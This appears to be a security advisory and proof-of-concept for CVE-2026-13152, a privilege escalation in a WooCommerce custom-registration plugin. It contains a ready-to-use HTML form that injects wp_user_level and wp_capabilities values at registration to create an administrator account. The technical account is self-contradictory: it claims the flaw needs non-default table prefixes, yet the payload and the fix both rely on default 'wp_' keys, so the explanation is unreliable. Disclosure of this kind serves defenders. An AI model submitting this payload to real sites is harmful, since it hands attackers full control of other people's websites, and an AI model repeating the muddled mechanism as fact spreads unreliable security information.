
CVE-2026-13152: Custom Fields Account Registration For WooCommerce Unauthenticated Privilege Escalation PoC & Advisory by Huynh Kien Minh (MinhHK).
CVE-2026-13152 is an unauthenticated privilege escalation vulnerability affecting the Custom Fields Account Registration For WooCommerce WordPress plugin prior to version 1.4, discovered and analyzed by security researcher Huynh Kien Minh (MinhHK). The flaw occurs because the plugin allows custom registration input fields to write directly to sensitive user capabilities metadata without sanitizing protected database keys or validating user roles. On sites using non-default database table prefixes or custom user meta key mappings, an unauthenticated user registering via the WooCommerce registration form can inject administrator privileges (such as wp_user_level or wp_capabilities) into the wp_usermeta table. This grants the newly created account full administrator access, enabling complete remote site compromise. Security researcher Huynh Kien Minh reported the vulnerability to WPScan, and the vendor resolved the issue in version 1.4 by implementing key name validation and restricting capability meta assignment.
| Attribute | Details |
|---|---|
| CVE ID | CVE-2026-13152 |
| Plugin Name | Custom Fields Account Registration For WooCommerce |
| Plugin Slug | custom-fields-account-registration-for-woocommerce |
| Affected Versions | < 1.4 |
| Fixed Version | 1.4 |
| Vulnerability Type | Unauthenticated Privilege Escalation (CWE-269 / OWASP A2) |
| CVSS v3.1 Score | 8.1 (High) (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) |
| Original Researcher | Huynh Kien Minh (MinhHK) |
| WPScan Advisory ID | 36aaba38-3143-4e80-8386-748632ff6704 |
The Custom Fields Account Registration For WooCommerce plugin allows site administrators to define custom input fields on the WooCommerce user registration form (my-account registration endpoint). When a new user submits the registration form, the plugin iterates over submitted form fields and calls update_user_meta($user_id, $meta_key, $meta_value) to persist user details.
The underlying flaw resides in the input processing logic within the registration handler. The plugin fails to maintain a strict blacklist or whitelist of protected WordPress user meta keys (wp_capabilities, wp_user_level, session_tokens, wp_user_roles).
// Vulnerable registration handler logic (simplified demonstration)
add_action('woocommerce_created_customer', 'cfar_save_custom_registration_fields', 10, 3);
function cfar_save_custom_registration_fields($customer_id, $new_customer_data, $password_generated) {
if (isset($_POST['cfar_custom_fields']) && is_array($_POST['cfar_custom_fields'])) {
foreach ($_POST['cfar_custom_fields'] as $meta_key => $meta_value) {
// VULNERABILITY: No check against protected meta keys like wp_capabilities or wp_user_level
update_user_meta($customer_id, sanitize_text_field($meta_key), sanitize_text_field($meta_value));
}
}
}
On WordPress installations utilizing custom database prefixes or custom meta key configurations, an unauthenticated attacker can supply a custom field input matching the administrator capability key (wp_user_level = 10 or serialized array a:1:{s:13:"administrator";b:1;}). Upon account creation, update_user_meta() writes this value directly into wp_usermeta, elevating the newly registered account to full Administrator status.
[!CAUTION] This Proof-of-Concept is provided strictly for educational purposes, defensive auditing, and vulnerability verification. Authorized testing only.
<!-- CVE-2026-13152 PoC: Unauthenticated Privilege Escalation Payload -->
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>PoC - CVE-2026-13152 Privilege Escalation</title>
</head>
<body>
<h2>CVE-2026-13152 Exploit Payload</h2>
<form action="https://target-site.com/my-account/" method="POST">
<input type="email" name="email" value="[email protected]" required>
<input type="password" name="password" value="P@ssword123!" required>
<!-- Malicious Meta Key Injection targeting User Level -->
<input type="hidden" name="cfar_custom_fields[wp_user_level]" value="10">
<input type="hidden" name="cfar_custom_fields[wp_capabilities][administrator]" value="1">
<input type="submit" name="register" value="Register as Administrator">
</form>
</body>
</html>
Custom Fields Account Registration For WooCommerce to version 1.4 or higher where strict meta key validation is enforced.// Secure implementation in Version 1.4
$protected_keys = array('wp_capabilities', 'wp_user_level', 'user_level', 'session_tokens');
if (!in_array($meta_key, $protected_keys, true) && strpos($meta_key, 'wp_') !== 0) {
update_user_meta($customer_id, $meta_key, $meta_value);
}